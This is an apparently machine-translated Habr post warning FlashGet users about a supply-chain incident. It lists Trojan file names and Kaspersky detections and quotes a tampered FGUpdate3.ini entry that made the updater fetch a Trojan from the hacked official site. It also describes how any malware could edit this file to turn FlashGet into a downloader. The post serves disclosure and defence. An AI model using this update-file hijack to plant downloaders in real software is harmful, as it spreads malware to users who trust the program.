The legal trojan is already on your board
This habratopic is information for thought for users of the popular FlashGet downloader client. I apologize in advance for the lack of working links, but something habr is buggy.
To search for Malvari
1. Multiple messages in the support from users that the antivirus on their computers began to detect Trojans in the FlashGet directory.
2. Panic on the Flashget program forum.
3. The main symptoms are the appearance of files with names in the system:
inapp4.exe inapp5.exe inapp6.exe
Detected by Kaspersky Anti-Virus as:
Trojan-Dropper.Win32.Agent.exo Dropper.Win32.Agent.ezo Trojan-Downloader.Win32.Agent.kht 4. No other Trojan programs through which the above-mentioned files could get into the system were detected.
5. The check revealed that, in addition to Trojans, the FGUpdate3.ini file has a recent creation and modification date (differences from the original file are highlighted):
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020inapp4.exe=1.0.0.1031[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%A link to the inapp4.exe file, which is a Trojan, leads to the real FlashGet site. It was from there that it was loaded as appA.cab .
6. “Vulnerability” exists in all versions of FlashGet 1.9.xx. No information about the incident on the site FlashGet is not detected, complete silence from the developers.
7. Despite the fact that at the moment the problem with the hacking site FlashGet solved, the vulnerability in the system of user security remains . Any Trojan program can change the local FlashGet ini-file, forcing it to work as a Trojan loader.
8. Who cares, Google knows where the full analysis of the situation by Kaspersky Lab specialists is located.
PS links something is not inserted as necessary ???
')
Source: https://habr.com/ru/post/22116/
All Articles